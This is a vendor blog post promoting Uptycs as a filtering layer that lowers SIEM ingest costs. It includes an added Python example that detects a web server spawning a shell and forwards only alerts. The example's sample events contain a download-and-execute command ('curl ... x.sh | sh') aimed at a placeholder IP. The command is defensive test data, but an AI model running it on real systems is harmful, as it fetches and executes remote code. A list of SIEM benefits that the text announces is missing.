The ability to aggregate and analyze data across multiple systems is a necessity for companies of all sizes, primarily for security and compliance reasons. For most businesses, SIEM (security information and event management) tools fulfill this function. But SIEM solutions, as they are traditionally used, can be costly, and that cost eventually pushes many security teams to make important decisions based on budget rather than on actual security needs.
That doesn’t have to be the case.
There’s no disputing the advantages of SIEMs, but there are ways to modify your workflow so you keep the benefits of centralized logging without incurring significant costs. This article covers some of the basics of SIEM usage and offers a way to enhance your SIEM’s capabilities so it becomes more cost-effective.
At its core, SIEM technology aggregates and stores data, making it available for use in a wide variety of applications. Many organizations use SIEM to meet compliance requirements (SOC 2, HIPAA, PCI, etc.), but large enterprises also use SIEM as an integral part of their threat management program. It’s the ideal way to gather data from various sources—network devices, servers, endpoints, and more—and analyze it for possible security threats. Security notifications that arise from SIEM systems can then be investigated further to determine the appropriate response from your security team.
Data collection and analysis is a necessary element of any mature security program, but why use a SIEM for this work? Benefits of a SIEM are:
The advantages listed above are why SIEM solutions are so popular in enterprises today. But the major disadvantage of a SIEM, its cost, erodes some of those advantages, making it hard for organizations to get the maximum value from the tool.
That’s because most SIEM vendors charge based on data ingested, usually gigabytes per day or events per second (EPS), and ingest volume is very difficult to predict. Organizations typically sign up for an estimated EPS level initially, need more later, and watch the costs keep climbing. At some point, decisions about expanding the SIEM revolve around money rather than around the challenges the SIEM was meant to address. The security program suffers as a result: when an incident does occur, the data isn't there to detect it proactively or to investigate it after the fact.
One way to address this challenge, and to make your SIEM more cost-efficient, is to enhance your SIEM workflow with the Uptycs security analytics platform. Uptycs is not a SIEM itself, but it augments SIEM systems by reducing the amount of data the SIEM has to process, which reduces the overall cost. Often, even at this lower cost, Uptycs provides net new data that closes infrastructure blind spots and aids investigations.
A traditional SIEM workflow looks like this:
Data logs → SIEM processing → Output
Large organizations feed incredible amounts of data into a SIEM, much of it from production servers and employee workstations, which are frequently the target of attacks. As processing costs increase, many organizations start to limit the data they pull from endpoints (even though they know it’s useful), compromising the effectiveness of their security program.
Uptycs couples the osquery agent with a powerful analytics engine to collect system data from endpoints across your organization—everything from servers and workstations to virtual machines, cloud instances, and containers—and store and aggregate it to enable valuable correlations and anomaly detection. It forwards to the SIEM only the necessary data—with context—related to the specific alerts or workflows that you care about. If you need more data from Uptycs, to aid in an investigation for example, it can be retrieved automatically through our API.
In this way it offloads some of the data collection and analytics from your SIEM system onto the Uptycs platform, enabling significant cost savings in data storage. (And Uptycs doesn’t charge by EPS or gigabytes per day.)
Here’s how the new workflow looks using Uptycs:
Data logs → Uptycs (e.g. alert) → SIEM → Output
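To make the filtering step in that workflow concrete, here is an added example in Python. It is not Uptycs product code and is not from the original page: it models an analytics layer that ingests constructed osquery-style process events, holds them locally, applies one assumed detection rule (a shell whose direct parent is a web server process), and forwards only the resulting alert with process-tree context, then measures how many bytes a per-gigabyte SIEM would have been billed for versus what it actually receives. The rule, field names, host name and the `fetch_raw` helper are all assumptions for illustration.

```python
"""Pre-SIEM filtering and enrichment, illustrated.

Added example, not Uptycs product code. An analytics layer ingests raw
osquery-style process events, keeps them locally, and forwards only alerts
(with process-tree context) to the SIEM. All events are constructed sample
data; the rule, field names and host name are assumptions for illustration.
"""
import json
from collections import defaultdict

# Assumed rule vocabulary: which binaries count as web servers and as shells.
WEB_SERVERS = {"/usr/sbin/nginx", "/usr/sbin/apache2", "/usr/sbin/httpd"}
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash"}


def _ev(time, pid, parent, uid, path, cmdline, host="web-01"):
    """One osquery process_events-style row (constructed sample data)."""
    return {"host": host, "time": time, "pid": pid, "parent": parent,
            "uid": uid, "path": path, "cmdline": cmdline}


def sample_events():
    """Constructed telemetry: mostly benign noise plus one suspicious chain."""
    events = [_ev(1700000000, 4101, 1, 0, "/usr/sbin/nginx", "nginx -g daemon off;")]
    for i in range(8):  # nginx workers forked by the master
        events.append(_ev(1700000005 + i, 4102 + i, 4101, 33,
                          "/usr/sbin/nginx", "nginx: worker process"))
    events.append(_ev(1700000010, 4300, 1, 0, "/usr/sbin/cron", "cron"))
    for i in range(20):  # cron running a maintenance script via sh: benign but shell-heavy
        events.append(_ev(1700000020 + 60 * i, 4400 + i, 4300, 0,
                          "/bin/sh", "sh -c /usr/local/bin/logrotate.sh"))
    # Suspicious: an nginx worker spawns a shell that downloads and runs a script.
    events += [
        _ev(1700000900, 5000, 4102, 33, "/bin/sh", "sh -c curl http://203.0.113.7/x.sh | sh"),
        _ev(1700000901, 5001, 5000, 33, "/usr/bin/curl", "curl http://203.0.113.7/x.sh"),
        _ev(1700000902, 5002, 5000, 33, "/bin/sh", "sh"),
    ]
    return sorted(events, key=lambda e: e["time"])


def index_events(events):
    """Index by pid and by parent pid so context can be rebuilt from local storage."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["parent"]].append(e)
    return by_pid, children


def ancestry(pid, by_pid):
    """Walk parent links (nearest first) until the chain leaves the telemetry we hold."""
    chain, e = [], by_pid.get(pid)
    while e is not None and e["parent"] in by_pid:
        e = by_pid[e["parent"]]
        chain.append(e)
    return chain


def descendants(pid, children):
    """Every process spawned, transitively, by pid, sorted by pid."""
    out, stack = [], list(children.get(pid, []))
    while stack:
        e = stack.pop()
        out.append(e)
        stack.extend(children.get(e["pid"], []))
    return sorted(out, key=lambda e: e["pid"])


def _summary(e):
    """Trimmed view of an event for alert context, to keep forwarded bytes small."""
    return {"pid": e["pid"], "path": e["path"], "cmdline": e["cmdline"]}


def detect(events):
    """Assumed rule: a shell whose direct parent is a web server process."""
    by_pid, children = index_events(events)
    alerts = []
    for e in events:
        parent = by_pid.get(e["parent"])
        if e["path"] in SHELLS and parent is not None and parent["path"] in WEB_SERVERS:
            alerts.append({
                "rule": "web_server_spawned_shell",
                "host": e["host"],
                "time": e["time"],
                "process": e,
                "ancestry": [_summary(a) for a in ancestry(e["pid"], by_pid)],
                "descendants": [_summary(d) for d in descendants(e["pid"], children)],
            })
    return alerts


def jsonl_bytes(records):
    """Size of records as JSON lines, the unit a per-gigabyte SIEM bills on."""
    return sum(len(json.dumps(r, separators=(",", ":"))) + 1 for r in records)


def volume_reduction(events, alerts):
    """Fraction of raw bytes that never reach the SIEM."""
    return 1 - jsonl_bytes(alerts) / jsonl_bytes(events)


def fetch_raw(events, host, start, end):
    """Stand-in for pulling full raw events back from local storage during an investigation."""
    return [e for e in events if e["host"] == host and start <= e["time"] <= end]


if __name__ == "__main__":
    evs = sample_events()
    found = detect(evs)
    for a in found:
        print(json.dumps(a, indent=1))
    print(f"raw events: {len(evs)}, alerts forwarded: {len(found)}, "
          f"volume reduction: {volume_reduction(evs, found):.0%}")
```

Run as a script it prints the single alert, with the nginx master and worker as ancestry and the curl and child shell as descendants, and reports the share of raw bytes the SIEM never has to ingest. The `fetch_raw` function stands in for the on-demand retrieval described above: when an investigation needs more than the alert carried, the full raw events for a host and time window are pulled from the analytics layer rather than having been paid for in the SIEM up front.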
And while a SIEM is certainly scalable, it isn’t necessarily designed for fast interactive queries; retrieving the results of a large query can take hours. Uptycs not only indexes data quickly but responds to a query in seconds, giving you immediate access to information so you can resolve security challenges quickly and easily.
If you’d like to read about our security platform in more detail, read our white paper, Trifecta of Security @ Scale; or, schedule a live demo to find out how Uptycs can be easily integrated into your SIEM workflow.